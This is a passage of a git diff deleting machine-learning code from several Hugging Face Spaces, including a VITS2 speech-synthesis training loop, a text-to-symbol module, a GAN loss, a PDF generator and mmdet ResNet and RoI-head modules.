- noise_scale_delta = 0.0 - if "use_duration_discriminator" in hps.model.keys() and hps.model.use_duration_discriminator == True: - print("Using duration discriminator for VITS2") - use_duration_discriminator = True - net_dur_disc = DurationDiscriminator( - hps.model.hidden_channels, - hps.model.hidden_channels, - 3, - 0.1, - gin_channels=hps.model.gin_channels if hps.data.n_speakers != 0 else 0, - ).cuda(rank) - if "use_spk_conditioned_encoder" in hps.model.keys() and hps.model.use_spk_conditioned_encoder == True: - if hps.data.n_speakers == 0: - raise ValueError("n_speakers must be > 0 when using spk conditioned encoder to train multi-speaker model") - use_spk_conditioned_encoder = True - else: - print("Using normal encoder for VITS1") - use_spk_conditioned_encoder = False - - net_g = SynthesizerTrn( - len(symbols), - hps.data.filter_length // 2 + 1, - hps.train.segment_size // hps.data.hop_length, - n_speakers=hps.data.n_speakers, - mas_noise_scale_initial = mas_noise_scale_initial, - noise_scale_delta = noise_scale_delta, - **hps.model).cuda(rank) - - freeze_enc = getattr(hps.model, "freeze_enc", False) - if freeze_enc: - print("freeze encoder !!!") - for param in net_g.enc_p.parameters(): - param.requires_grad = False - - net_d = MultiPeriodDiscriminator(hps.model.use_spectral_norm).cuda(rank) - optim_g = torch.optim.AdamW( - filter(lambda p: p.requires_grad, net_g.parameters()), - hps.train.learning_rate, - betas=hps.train.betas, - eps=hps.train.eps) - optim_d = torch.optim.AdamW( - net_d.parameters(), - hps.train.learning_rate, - betas=hps.train.betas, - eps=hps.train.eps) - if net_dur_disc is not None: - optim_dur_disc = torch.optim.AdamW( - net_dur_disc.parameters(), - hps.train.learning_rate, - betas=hps.train.betas, - eps=hps.train.eps) - else: - optim_dur_disc = None - net_g = DDP(net_g, device_ids=[rank], find_unused_parameters=True) - net_d = DDP(net_d, device_ids=[rank], find_unused_parameters=True) - if net_dur_disc is not None: - net_dur_disc = DDP(net_dur_disc, device_ids=[rank], find_unused_parameters=True) - - pretrain_dir = None - if pretrain_dir is None: - try: - if net_dur_disc is not None: - _, optim_dur_disc, _, epoch_str = utils.load_checkpoint(utils.latest_checkpoint_path(hps.model_dir, "DUR_*.pth"), net_dur_disc, optim_dur_disc, skip_optimizer=not hps.cont) - _, optim_g, _, epoch_str = utils.load_checkpoint(utils.latest_checkpoint_path(hps.model_dir, "G_*.pth"), net_g, - optim_g, skip_optimizer=not hps.cont) - _, optim_d, _, epoch_str = utils.load_checkpoint(utils.latest_checkpoint_path(hps.model_dir, "D_*.pth"), net_d, - optim_d, skip_optimizer=not hps.cont) - - epoch_str = max(epoch_str, 1) - global_step = (epoch_str - 1) * len(train_loader) - except Exception as e: - print(e) - epoch_str = 1 - global_step = 0 - else: - _, _, _, epoch_str = utils.load_checkpoint(utils.latest_checkpoint_path(pretrain_dir, "G_*.pth"), net_g, - optim_g, True) - _, _, _, epoch_str = utils.load_checkpoint(utils.latest_checkpoint_path(pretrain_dir, "D_*.pth"), net_d, - optim_d, True) - - - - scheduler_g = torch.optim.lr_scheduler.ExponentialLR(optim_g, gamma=hps.train.lr_decay, last_epoch=epoch_str - 2) - scheduler_d = torch.optim.lr_scheduler.ExponentialLR(optim_d, gamma=hps.train.lr_decay, last_epoch=epoch_str - 2) - if net_dur_disc is not None: - scheduler_dur_disc = torch.optim.lr_scheduler.ExponentialLR(optim_dur_disc, gamma=hps.train.lr_decay, last_epoch=epoch_str-2) - else: - scheduler_dur_disc = None - scaler = GradScaler(enabled=hps.train.fp16_run) - - for epoch in range(epoch_str, hps.train.epochs + 1): - if rank == 0: - train_and_evaluate(rank, epoch, hps, [net_g, net_d, net_dur_disc], [optim_g, optim_d, optim_dur_disc], [scheduler_g, scheduler_d, scheduler_dur_disc], scaler, [train_loader, eval_loader], logger, [writer, writer_eval]) - else: - train_and_evaluate(rank, epoch, hps, [net_g, net_d, net_dur_disc], [optim_g, optim_d, optim_dur_disc], [scheduler_g, scheduler_d, scheduler_dur_disc], scaler, [train_loader, None], None, None) - scheduler_g.step() - scheduler_d.step() - if net_dur_disc is not None: - scheduler_dur_disc.step() - - -def train_and_evaluate(rank, epoch, hps, nets, optims, schedulers, scaler, loaders, logger, writers): - net_g, net_d, net_dur_disc = nets - optim_g, optim_d, optim_dur_disc = optims - scheduler_g, scheduler_d, scheduler_dur_disc = schedulers - train_loader, eval_loader = loaders - if writers is not None: - writer, writer_eval = writers - - train_loader.batch_sampler.set_epoch(epoch) - global global_step - - net_g.train() - net_d.train() - if net_dur_disc is not None: - net_dur_disc.train() - for batch_idx, (x, x_lengths, spec, spec_lengths, y, y_lengths, speakers, tone, language, bert) in tqdm(enumerate(train_loader)): - if net_g.module.use_noise_scaled_mas: - current_mas_noise_scale = net_g.module.mas_noise_scale_initial - net_g.module.noise_scale_delta * global_step - net_g.module.current_mas_noise_scale = max(current_mas_noise_scale, 0.0) - x, x_lengths = x.cuda(rank, non_blocking=True), x_lengths.cuda(rank, non_blocking=True) - spec, spec_lengths = spec.cuda(rank, non_blocking=True), spec_lengths.cuda(rank, non_blocking=True) - y, y_lengths = y.cuda(rank, non_blocking=True), y_lengths.cuda(rank, non_blocking=True) - speakers = speakers.cuda(rank, non_blocking=True) - tone = tone.cuda(rank, non_blocking=True) - language = language.cuda(rank, non_blocking=True) - bert = bert.cuda(rank, non_blocking=True) - - with autocast(enabled=hps.train.fp16_run): - y_hat, l_length, attn, ids_slice, x_mask, z_mask, \ - (z, z_p, m_p, logs_p, m_q, logs_q), (hidden_x, logw, logw_) = net_g(x, x_lengths, spec, spec_lengths, speakers, tone, language, bert) - mel = spec_to_mel_torch( - spec, - hps.data.filter_length, - hps.data.n_mel_channels, - hps.data.sampling_rate, - hps.data.mel_fmin, - hps.data.mel_fmax) - y_mel = commons.slice_segments(mel, ids_slice, hps.train.segment_size // hps.data.hop_length) - y_hat_mel = mel_spectrogram_torch( - y_hat.squeeze(1), - hps.data.filter_length, - hps.data.n_mel_channels, - hps.data.sampling_rate, - hps.data.hop_length, - hps.data.win_length, - hps.data.mel_fmin, - hps.data.mel_fmax - ) - - y = commons.slice_segments(y, ids_slice * hps.data.hop_length, hps.train.segment_size) # slice - - # Discriminator - y_d_hat_r, y_d_hat_g, _, _ = net_d(y, y_hat.detach()) - with autocast(enabled=False): - loss_disc, losses_disc_r, losses_disc_g = discriminator_loss(y_d_hat_r, y_d_hat_g) - loss_disc_all = loss_disc - if net_dur_disc is not None: - y_dur_hat_r, y_dur_hat_g = net_dur_disc(hidden_x.detach(), x_mask.detach(), logw.detach(), logw_.detach()) - with autocast(enabled=False): - # TODO: I think need to mean using the mask, but for now, just mean all - loss_dur_disc, losses_dur_disc_r, losses_dur_disc_g = discriminator_loss(y_dur_hat_r, y_dur_hat_g) - loss_dur_disc_all = loss_dur_disc - optim_dur_disc.zero_grad() - scaler.scale(loss_dur_disc_all).backward() - scaler.unscale_(optim_dur_disc) - grad_norm_dur_disc = commons.clip_grad_value_(net_dur_disc.parameters(), None) - scaler.step(optim_dur_disc) - - optim_d.zero_grad() - scaler.scale(loss_disc_all).backward() - scaler.unscale_(optim_d) - grad_norm_d = commons.clip_grad_value_(net_d.parameters(), None) - scaler.step(optim_d) - - with autocast(enabled=hps.train.fp16_run): - # Generator - y_d_hat_r, y_d_hat_g, fmap_r, fmap_g = net_d(y, y_hat) - if net_dur_disc is not None: - y_dur_hat_r, y_dur_hat_g = net_dur_disc(hidden_x, x_mask, logw, logw_) - with autocast(enabled=False): - loss_dur = torch.sum(l_length.float()) - loss_mel = F.l1_loss(y_mel, y_hat_mel) * hps.train.c_mel - loss_kl = kl_loss(z_p, logs_q, m_p, logs_p, z_mask) * hps.train.c_kl - - loss_fm = feature_loss(fmap_r, fmap_g) - loss_gen, losses_gen = generator_loss(y_d_hat_g) - loss_gen_all = loss_gen + loss_fm + loss_mel + loss_dur + loss_kl - if net_dur_disc is not None: - loss_dur_gen, losses_dur_gen = generator_loss(y_dur_hat_g) - loss_gen_all += loss_dur_gen - optim_g.zero_grad() - scaler.scale(loss_gen_all).backward() - scaler.unscale_(optim_g) - grad_norm_g = commons.clip_grad_value_(net_g.parameters(), None) - scaler.step(optim_g) - scaler.update() - - if rank == 0: - if global_step % hps.train.log_interval == 0: - lr = optim_g.param_groups[0]['lr'] - losses = [loss_disc, loss_gen, loss_fm, loss_mel, loss_dur, loss_kl] - logger.info('Train Epoch: {} [{:.0f}%]'.format( - epoch, - 100. * batch_idx / len(train_loader))) - logger.info([x.item() for x in losses] + [global_step, lr]) - - scalar_dict = {"loss/g/total": loss_gen_all, "loss/d/total": loss_disc_all, "learning_rate": lr, - "grad_norm_d": grad_norm_d, "grad_norm_g": grad_norm_g} - scalar_dict.update( - {"loss/g/fm": loss_fm, "loss/g/mel": loss_mel, "loss/g/dur": loss_dur, "loss/g/kl": loss_kl}) - scalar_dict.update({"loss/g/{}".format(i): v for i, v in enumerate(losses_gen)}) - scalar_dict.update({"loss/d_r/{}".format(i): v for i, v in enumerate(losses_disc_r)}) - scalar_dict.update({"loss/d_g/{}".format(i): v for i, v in enumerate(losses_disc_g)}) - - image_dict = { - "slice/mel_org": utils.plot_spectrogram_to_numpy(y_mel[0].data.cpu().numpy()), - "slice/mel_gen": utils.plot_spectrogram_to_numpy(y_hat_mel[0].data.cpu().numpy()), - "all/mel": utils.plot_spectrogram_to_numpy(mel[0].data.cpu().numpy()), - "all/attn": utils.plot_alignment_to_numpy(attn[0, 0].data.cpu().numpy()) - } - utils.summarize( - writer=writer, - global_step=global_step, - images=image_dict, - scalars=scalar_dict) - - if global_step % hps.train.eval_interval == 0: - evaluate(hps, net_g, eval_loader, writer_eval) - utils.save_checkpoint(net_g, optim_g, hps.train.learning_rate, epoch, - os.path.join(hps.model_dir, "G_{}.pth".format(global_step))) - utils.save_checkpoint(net_d, optim_d, hps.train.learning_rate, epoch, - os.path.join(hps.model_dir, "D_{}.pth".format(global_step))) - if net_dur_disc is not None: - utils.save_checkpoint(net_dur_disc, optim_dur_disc, hps.train.learning_rate, epoch, os.path.join(hps.model_dir, "DUR_{}.pth".format(global_step))) - keep_ckpts = getattr(hps.train, 'keep_ckpts', 5) - if keep_ckpts > 0: - utils.clean_checkpoints(path_to_models=hps.model_dir, n_ckpts_to_keep=keep_ckpts, sort_by_time=True) - - - global_step += 1 - - if rank == 0: - logger.info('====> Epoch: {}'.format(epoch)) - - - -def evaluate(hps, generator, eval_loader, writer_eval): - generator.eval() - image_dict = {} - audio_dict = {} - print("Evaluating ...") - with torch.no_grad(): - for batch_idx, (x, x_lengths, spec, spec_lengths, y, y_lengths, speakers, tone, language, bert) in enumerate(eval_loader): - x, x_lengths = x.cuda(), x_lengths.cuda() - spec, spec_lengths = spec.cuda(), spec_lengths.cuda() - y, y_lengths = y.cuda(), y_lengths.cuda() - speakers = speakers.cuda() - bert = bert.cuda() - tone = tone.cuda() - language = language.cuda() - for use_sdp in [True, False]: - y_hat, attn, mask, *_ = generator.module.infer(x, x_lengths, speakers, tone, language, bert, y=spec, max_len=1000, sdp_ratio=0.0 if not use_sdp else 1.0) - y_hat_lengths = mask.sum([1, 2]).long() * hps.data.hop_length - - mel = spec_to_mel_torch( - spec, - hps.data.filter_length, - hps.data.n_mel_channels, - hps.data.sampling_rate, - hps.data.mel_fmin, - hps.data.mel_fmax) - y_hat_mel = mel_spectrogram_torch( - y_hat.squeeze(1).float(), - hps.data.filter_length, - hps.data.n_mel_channels, - hps.data.sampling_rate, - hps.data.hop_length, - hps.data.win_length, - hps.data.mel_fmin, - hps.data.mel_fmax - ) - image_dict.update({ - f"gen/mel_{batch_idx}": utils.plot_spectrogram_to_numpy(y_hat_mel[0].cpu().numpy()) - }) - audio_dict.update({ - f"gen/audio_{batch_idx}_{use_sdp}": y_hat[0, :, :y_hat_lengths[0]] - }) - image_dict.update({f"gt/mel_{batch_idx}": utils.plot_spectrogram_to_numpy(mel[0].cpu().numpy())}) - audio_dict.update({f"gt/audio_{batch_idx}": y[0, :, :y_lengths[0]]}) - - utils.summarize( - writer=writer_eval, - global_step=global_step, - images=image_dict, - audios=audio_dict, - audio_sampling_rate=hps.data.sampling_rate - ) - generator.train() - -if __name__ == "__main__": - main() diff --git a/spaces/Yiqin/ChatVID/model/vision/grit_src/third_party/CenterNet2/detectron2/data/datasets/__init__.py b/spaces/Yiqin/ChatVID/model/vision/grit_src/third_party/CenterNet2/detectron2/data/datasets/__init__.py deleted file mode 100644 index a44bedc15e5f0e762fc4d77efd6f1b07c6ff77d0..0000000000000000000000000000000000000000 --- a/spaces/Yiqin/ChatVID/model/vision/grit_src/third_party/CenterNet2/detectron2/data/datasets/__init__.py +++ /dev/null @@ -1,9 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -from .coco import load_coco_json, load_sem_seg, register_coco_instances, convert_to_coco_json -from .coco_panoptic import register_coco_panoptic, register_coco_panoptic_separated -from .lvis import load_lvis_json, register_lvis_instances, get_lvis_instances_meta -from .pascal_voc import load_voc_instances, register_pascal_voc -from . import builtin as _builtin # ensure the builtin datasets are registered - - -__all__ = [k for k in globals().keys() if not k.startswith("_")] diff --git a/spaces/YuanMio/vits-uma-genshin-honkai/text/__init__.py b/spaces/YuanMio/vits-uma-genshin-honkai/text/__init__.py deleted file mode 100644 index 663c4b6416affb53c9dc56dddbc8b2b65d4bf518..0000000000000000000000000000000000000000 --- a/spaces/YuanMio/vits-uma-genshin-honkai/text/__init__.py +++ /dev/null @@ -1,57 +0,0 @@ -""" from https://github.com/keithito/tacotron """ -from text import cleaners -from text.symbols import symbols - - -# Mappings from symbol to numeric ID and vice versa: -_symbol_to_id = {s: i for i, s in enumerate(symbols)} -_id_to_symbol = {i: s for i, s in enumerate(symbols)} - - -def text_to_sequence(text, symbols, cleaner_names): - '''Converts a string of text to a sequence of IDs corresponding to the symbols in the text. - Args: - text: string to convert to a sequence - cleaner_names: names of the cleaner functions to run the text through - Returns: - List of integers corresponding to the symbols in the text - ''' - _symbol_to_id = {s: i for i, s in enumerate(symbols)} - sequence = [] - - clean_text = _clean_text(text, cleaner_names) - for symbol in clean_text: - if symbol not in _symbol_to_id.keys(): - continue - symbol_id = _symbol_to_id[symbol] - sequence += [symbol_id] - return sequence, clean_text - - -def cleaned_text_to_sequence(cleaned_text): - '''Converts a string of text to a sequence of IDs corresponding to the symbols in the text. - Args: - text: string to convert to a sequence - Returns: - List of integers corresponding to the symbols in the text - ''' - sequence = [_symbol_to_id[symbol] for symbol in cleaned_text if symbol in _symbol_to_id.keys()] - return sequence - - -def sequence_to_text(sequence): - '''Converts a sequence of IDs back to a string''' - result = '' - for symbol_id in sequence: - s = _id_to_symbol[symbol_id] - result += s - return result - - -def _clean_text(text, cleaner_names): - for name in cleaner_names: - cleaner = getattr(cleaners, name) - if not cleaner: - raise Exception('Unknown cleaner: %s' % name) - text = cleaner(text) - return text diff --git a/spaces/Yuliang/ECON/lib/net/GANLoss.py b/spaces/Yuliang/ECON/lib/net/GANLoss.py deleted file mode 100644 index 79c778a403eb249687ac4850cfb2fb84e5e1dcfb..0000000000000000000000000000000000000000 --- a/spaces/Yuliang/ECON/lib/net/GANLoss.py +++ /dev/null @@ -1,74 +0,0 @@ -""" The code is based on https://github.com/apple/ml-gsn/ with adaption. """ - -import torch -import torch.nn as nn -import torch.nn.functional as F -from torch import autograd - -from lib.net.Discriminator import StyleDiscriminator - - -def hinge_loss(fake_pred, real_pred, mode): - if mode == 'd': - # Discriminator update - d_loss_fake = torch.mean(F.relu(1.0 + fake_pred)) - d_loss_real = torch.mean(F.relu(1.0 - real_pred)) - d_loss = d_loss_fake + d_loss_real - elif mode == 'g': - # Generator update - d_loss = -torch.mean(fake_pred) - return d_loss - - -def logistic_loss(fake_pred, real_pred, mode): - if mode == 'd': - # Discriminator update - d_loss_fake = torch.mean(F.softplus(fake_pred)) - d_loss_real = torch.mean(F.softplus(-real_pred)) - d_loss = d_loss_fake + d_loss_real - elif mode == 'g': - # Generator update - d_loss = torch.mean(F.softplus(-fake_pred)) - return d_loss - - -def r1_loss(real_pred, real_img): - (grad_real, ) = autograd.grad(outputs=real_pred.sum(), inputs=real_img, create_graph=True) - grad_penalty = grad_real.pow(2).reshape(grad_real.shape[0], -1).sum(1).mean() - return grad_penalty - - -class GANLoss(nn.Module): - def __init__( - self, - opt, - disc_loss='logistic', - ): - super().__init__() - self.opt = opt.gan - - input_dim = 3 - self.discriminator = StyleDiscriminator(input_dim, self.opt.img_res) - - if disc_loss == 'hinge': - self.disc_loss = hinge_loss - elif disc_loss == 'logistic': - self.disc_loss = logistic_loss - - def forward(self, input): - - disc_in_real = input['norm_real'] - disc_in_fake = input['norm_fake'] - - logits_real = self.discriminator(disc_in_real) - logits_fake = self.discriminator(disc_in_fake) - - disc_loss = self.disc_loss(fake_pred=logits_fake, real_pred=logits_real, mode='d') - - log = { - "disc_loss": disc_loss.detach(), - "logits_real": logits_real.mean().detach(), - "logits_fake": logits_fake.mean().detach(), - } - - return disc_loss * self.opt.lambda_gan, log diff --git a/spaces/Zengyf-CVer/Gradio_YOLOv5_Det_v3/util/pdf_opt.py b/spaces/Zengyf-CVer/Gradio_YOLOv5_Det_v3/util/pdf_opt.py deleted file mode 100644 index 541e9cdd7b1a2c0017f74eadf11f9a7d713734c3..0000000000000000000000000000000000000000 --- a/spaces/Zengyf-CVer/Gradio_YOLOv5_Det_v3/util/pdf_opt.py +++ /dev/null @@ -1,78 +0,0 @@ -# PDF management -# author: Zeng Yifu -# creation time: 2022-05-05 - -from fpdf import FPDF - - -# PDF generation class -class PDF(FPDF): - # Reference: https://pyfpdf.readthedocs.io/en/latest/Tutorial/index.html - def header(self): - # Set Chinese font - self.add_font("SimSun", "", "./fonts/SimSun.ttf", uni=True) - self.set_font("SimSun", "", 16) - # Calculate width of title and position - w = self.get_string_width(title) + 6 - self.set_x((210 - w) / 2) - # Colors of frame, background and text - self.set_draw_color(255, 255, 255) - self.set_fill_color(255, 255, 255) - self.set_text_color(0, 0, 0) - # Thickness of frame (1 mm) - # self.set_line_width(1) - # Title - self.cell(w, 9, title, 1, 1, "C", 1) - # Line break - self.ln(10) - - def footer(self): - # Position at 1.5 cm from bottom - self.set_y(-15) - # Set Chinese font - self.add_font("SimSun", "", "./fonts/SimSun.ttf", uni=True) - self.set_font("SimSun", "", 12) - # Text color in gray - self.set_text_color(128) - # Page number - self.cell(0, 10, "Page " + str(self.page_no()), 0, 0, "C") - - def chapter_title(self, num, label): - # Set Chinese font - self.add_font("SimSun", "", "./fonts/SimSun.ttf", uni=True) - self.set_font("SimSun", "", 12) - # Background color - self.set_fill_color(200, 220, 255) - # Title - # self.cell(0, 6, 'Chapter %d : %s' % (num, label), 0, 1, 'L', 1) - self.cell(0, 6, "Test result:", 0, 1, "L", 1) - # Line break - self.ln(4) - - def chapter_body(self, name): - - # Set Chinese font - self.add_font("SimSun", "", "./fonts/SimSun.ttf", uni=True) - self.set_font("SimSun", "", 12) - # Output justified text - self.multi_cell(0, 5, name) - # Line break - self.ln() - self.cell(0, 5, "--------------------------------------") - - def print_chapter(self, num, title, name): - self.add_page() - self.chapter_title(num, title) - self.chapter_body(name) - - -# pdf generation function -def pdf_generate(input_file, output_file, title_): - global title - - title = title_ - pdf = PDF() - pdf.set_title(title) - pdf.set_author("Zeng Yifu") - pdf.print_chapter(1, "A RUNAWAY REEF", input_file) - pdf.output(output_file) \ No newline at end of file diff --git a/spaces/abhishek/sketch-to-image/annotator/uniformer/mmdet/models/utils/res_layer.py b/spaces/abhishek/sketch-to-image/annotator/uniformer/mmdet/models/utils/res_layer.py deleted file mode 100644 index 4a4efd3dd30b30123ed5135eac080ad9f7f7b448..0000000000000000000000000000000000000000 --- a/spaces/abhishek/sketch-to-image/annotator/uniformer/mmdet/models/utils/res_layer.py +++ /dev/null @@ -1,187 +0,0 @@ -from mmcv.cnn import build_conv_layer, build_norm_layer -from torch import nn as nn - - -class ResLayer(nn.Sequential): - """ResLayer to build ResNet style backbone. - - Args: - block (nn.Module): block used to build ResLayer. - inplanes (int): inplanes of block. - planes (int): planes of block. - num_blocks (int): number of blocks. - stride (int): stride of the first block. Default: 1 - avg_down (bool): Use AvgPool instead of stride conv when - downsampling in the bottleneck. Default: False - conv_cfg (dict): dictionary to construct and config conv layer. - Default: None - norm_cfg (dict): dictionary to construct and config norm layer. - Default: dict(type='BN') - downsample_first (bool): Downsample at the first block or last block. - False for Hourglass, True for ResNet. Default: True - """ - - def __init__(self, - block, - inplanes, - planes, - num_blocks, - stride=1, - avg_down=False, - conv_cfg=None, - norm_cfg=dict(type='BN'), - downsample_first=True, - **kwargs): - self.block = block - - downsample = None - if stride != 1 or inplanes != planes * block.expansion: - downsample = [] - conv_stride = stride - if avg_down: - conv_stride = 1 - downsample.append( - nn.AvgPool2d( - kernel_size=stride, - stride=stride, - ceil_mode=True, - count_include_pad=False)) - downsample.extend([ - build_conv_layer( - conv_cfg, - inplanes, - planes * block.expansion, - kernel_size=1, - stride=conv_stride, - bias=False), - build_norm_layer(norm_cfg, planes * block.expansion)[1] - ]) - downsample = nn.Sequential(*downsample) - - layers = [] - if downsample_first: - layers.append( - block( - inplanes=inplanes, - planes=planes, - stride=stride, - downsample=downsample, - conv_cfg=conv_cfg, - norm_cfg=norm_cfg, - **kwargs)) - inplanes = planes * block.expansion - for _ in range(1, num_blocks): - layers.append( - block( - inplanes=inplanes, - planes=planes, - stride=1, - conv_cfg=conv_cfg, - norm_cfg=norm_cfg, - **kwargs)) - - else: # downsample_first=False is for HourglassModule - for _ in range(num_blocks - 1): - layers.append( - block( - inplanes=inplanes, - planes=inplanes, - stride=1, - conv_cfg=conv_cfg, - norm_cfg=norm_cfg, - **kwargs)) - layers.append( - block( - inplanes=inplanes, - planes=planes, - stride=stride, - downsample=downsample, - conv_cfg=conv_cfg, - norm_cfg=norm_cfg, - **kwargs)) - super(ResLayer, self).__init__(*layers) - - -class SimplifiedBasicBlock(nn.Module): - """Simplified version of original basic residual block. This is used in - `SCNet `_. - - - Norm layer is now optional - - Last ReLU in forward function is removed - """ - expansion = 1 - - def __init__(self, - inplanes, - planes, - stride=1, - dilation=1, - downsample=None, - style='pytorch', - with_cp=False, - conv_cfg=None, - norm_cfg=dict(type='BN'), - dcn=None, - plugins=None): - super(SimplifiedBasicBlock, self).__init__() - assert dcn is None, 'Not implemented yet.' - assert plugins is None, 'Not implemented yet.' - assert not with_cp, 'Not implemented yet.' - self.with_norm = norm_cfg is not None - with_bias = True if norm_cfg is None else False - self.conv1 = build_conv_layer( - conv_cfg, - inplanes, - planes, - 3, - stride=stride, - padding=dilation, - dilation=dilation, - bias=with_bias) - if self.with_norm: - self.norm1_name, norm1 = build_norm_layer( - norm_cfg, planes, postfix=1) - self.add_module(self.norm1_name, norm1) - self.conv2 = build_conv_layer( - conv_cfg, planes, planes, 3, padding=1, bias=with_bias) - if self.with_norm: - self.norm2_name, norm2 = build_norm_layer( - norm_cfg, planes, postfix=2) - self.add_module(self.norm2_name, norm2) - - self.relu = nn.ReLU(inplace=True) - self.downsample = downsample - self.stride = stride - self.dilation = dilation - self.with_cp = with_cp - - @property - def norm1(self): - """nn.Module: normalization layer after the first convolution layer""" - return getattr(self, self.norm1_name) if self.with_norm else None - - @property - def norm2(self): - """nn.Module: normalization layer after the second convolution layer""" - return getattr(self, self.norm2_name) if self.with_norm else None - - def forward(self, x): - """Forward function.""" - - identity = x - - out = self.conv1(x) - if self.with_norm: - out = self.norm1(out) - out = self.relu(out) - - out = self.conv2(out) - if self.with_norm: - out = self.norm2(out) - - if self.downsample is not None: - identity = self.downsample(x) - - out += identity - - return out diff --git a/spaces/abhishek/sketch-to-image/annotator/uniformer/mmdet_null/models/roi_heads/standard_roi_head.py b/spaces/abhishek/sketch-to-image/annotator/uniformer/mmdet_null/models/roi_heads/standard_roi_head.py deleted file mode 100644 index c530f2a5ce904439492de12ff7d267cc1e757d3a..0000000000000000000000000000000000000000 --- a/spaces/abhishek/sketch-to-image/annotator/uniformer/mmdet_null/models/roi_heads/standard_roi_head.py +++ /dev/null @@ -1,295 +0,0 @@ -import torch - -from mmdet.core import bbox2result, bbox2roi, build_assigner, build_sampler -from ..builder import HEADS, build_head, build_roi_extractor -from .base_roi_head import BaseRoIHead -from .test_mixins import BBoxTestMixin, MaskTestMixin - - -@HEADS.register_module() -class StandardRoIHead(BaseRoIHead, BBoxTestMixin, MaskTestMixin): - """Simplest base roi head including one bbox head and one mask head.""" - - def init_assigner_sampler(self): - """Initialize assigner and sampler.""" - self.bbox_assigner = None - self.bbox_sampler = None - if self.train_cfg: - self.bbox_assigner = build_assigner(self.train_cfg.assigner) - self.bbox_sampler = build_sampler( - self.train_cfg.sampler, context=self) - - def init_bbox_head(self, bbox_roi_extractor, bbox_head): - """Initialize ``bbox_head``""" - self.bbox_roi_extractor = build_roi_extractor(bbox_roi_extractor) - self.bbox_head = build_head(bbox_head) - - def init_mask_head(self, mask_roi_extractor, mask_head): - """Initialize ``mask_head``""" - if mask_roi_extractor is not None: - self.mask_roi_extractor = build_roi_extractor(mask_roi_extractor) - self.share_roi_extractor = False - else: - self.share_roi_extractor = True - self.mask_roi_extractor = self.bbox_roi_extractor - self.mask_head = build_head(mask_head) - - def init_weights(self, pretrained): - """Initialize the weights in head. - - Args: - pretrained (str, optional): Path to pre-trained weights. - Defaults to None. - """ - if self.with_shared_head: - self.shared_head.init_weights(pretrained=pretrained) - if self.with_bbox: - self.bbox_roi_extractor.init_weights() - self.bbox_head.init_weights() - if self.with_mask: - self.mask_head.init_weights() - if not self.share_roi_extractor: - self.mask_roi_extractor.init_weights() - - def forward_dummy(self, x, proposals): - """Dummy forward function.""" - # bbox head - outs = () - rois = bbox2roi([proposals]) - if self.with_bbox: - bbox_results = self._bbox_forward(x, rois) - outs = outs + (bbox_results['cls_score'], - bbox_results['bbox_pred']) - # mask head - if self.with_mask: - mask_rois = rois[:100] - mask_results = self._mask_forward(x, mask_rois) - outs = outs + (mask_results['mask_pred'], ) - return outs - - def forward_train(self, - x, - img_metas, - proposal_list, - gt_bboxes, - gt_labels, - gt_bboxes_ignore=None, - gt_masks=None): - """ - Args: - x (list[Tensor]): list of multi-level img features. - img_metas (list[dict]): list of image info dict where each dict - has: 'img_shape', 'scale_factor', 'flip', and may also contain - 'filename', 'ori_shape', 'pad_shape', and 'img_norm_cfg'. - For details on the values of these keys see - `mmdet/datasets/pipelines/formatting.py:Collect`. - proposals (list[Tensors]): list of region proposals. - gt_bboxes (list[Tensor]): Ground truth bboxes for each image with - shape (num_gts, 4) in [tl_x, tl_y, br_x, br_y] format. - gt_labels (list[Tensor]): class indices corresponding to each box - gt_bboxes_ignore (None | list[Tensor]): specify which bounding - boxes can be ignored when computing the loss. - gt_masks (None | Tensor) : true segmentation masks for each box - used if the architecture supports a segmentation task. - - Returns: - dict[str, Tensor]: a dictionary of loss components - """ - # assign gts and sample proposals - if self.with_bbox or self.with_mask: - num_imgs = len(img_metas) - if gt_bboxes_ignore is None: - gt_bboxes_ignore = [None for _ in range(num_imgs)] - sampling_results = [] - for i in range(num_imgs): - assign_result = self.bbox_assigner.assign( - proposal_list[i], gt_bboxes[i], gt_bboxes_ignore[i], - gt_labels[i]) - sampling_result = self.bbox_sampler.sample( - assign_result, - proposal_list[i], - gt_bboxes[i], - gt_labels[i], - feats=[lvl_feat[i][None] for lvl_feat in x]) - sampling_results.append(sampling_result) - - losses = dict() - # bbox head forward and loss - if self.with_bbox: - bbox_results = self._bbox_forward_train(x, sampling_results, - gt_bboxes, gt_labels, - img_metas) - losses.update(bbox_results['loss_bbox']) - - # mask head forward and loss - if self.with_mask: - mask_results = self._mask_forward_train(x, sampling_results, - bbox_results['bbox_feats'], - gt_masks, img_metas) - losses.update(mask_results['loss_mask']) - - return losses - - def _bbox_forward(self, x, rois): - """Box head forward function used in both training and testing.""" - # TODO: a more flexible way to decide which feature maps to use - bbox_feats = self.bbox_roi_extractor( - x[:self.bbox_roi_extractor.num_inputs], rois) - if self.with_shared_head: - bbox_feats = self.shared_head(bbox_feats) - cls_score, bbox_pred = self.bbox_head(bbox_feats) - - bbox_results = dict( - cls_score=cls_score, bbox_pred=bbox_pred, bbox_feats=bbox_feats) - return bbox_results - - def _bbox_forward_train(self, x, sampling_results, gt_bboxes, gt_labels, - img_metas): - """Run forward function and calculate loss for box head in training.""" - rois = bbox2roi([res.bboxes for res in sampling_results]) - bbox_results = self._bbox_forward(x, rois) - - bbox_targets = self.bbox_head.get_targets(sampling_results, gt_bboxes, - gt_labels, self.train_cfg) - loss_bbox = self.bbox_head.loss(bbox_results['cls_score'], - bbox_results['bbox_pred'], rois, - *bbox_targets) - - bbox_results.update(loss_bbox=loss_bbox) - return bbox_results - - def _mask_forward_train(self, x, sampling_results, bbox_feats, gt_masks, - img_metas): - """Run forward function and calculate loss for mask head in - training.""" - if not self.share_roi_extractor: - pos_rois = bbox2roi([res.pos_bboxes for res in sampling_results]) - mask_results = self._mask_forward(x, pos_rois) - else: - pos_inds = [] - device = bbox_feats.device - for res in sampling_results: - pos_inds.append( - torch.ones( - res.pos_bboxes.shape[0], - device=device, - dtype=torch.uint8)) - pos_inds.append( - torch.zeros( - res.neg_bboxes.shape[0], - device=device, - dtype=torch.uint8)) - pos_inds = torch.cat(pos_inds) - - mask_results = self._mask_forward( - x, pos_inds=pos_inds, bbox_feats=bbox_feats) - - mask_targets = self.mask_head.get_targets(sampling_results, gt_masks, - self.train_cfg) - pos_labels = torch.cat([res.pos_gt_labels for res in sampling_results]) - loss_mask = self.mask_head.loss(mask_results['mask_pred'], - mask_targets, pos_labels) - - mask_results.update(loss_mask=loss_mask, mask_targets=mask_targets) - return mask_results - - def _mask_forward(self, x, rois=None, pos_inds=None, bbox_feats=None): - """Mask head forward function used in both training and testing.""" - assert ((rois 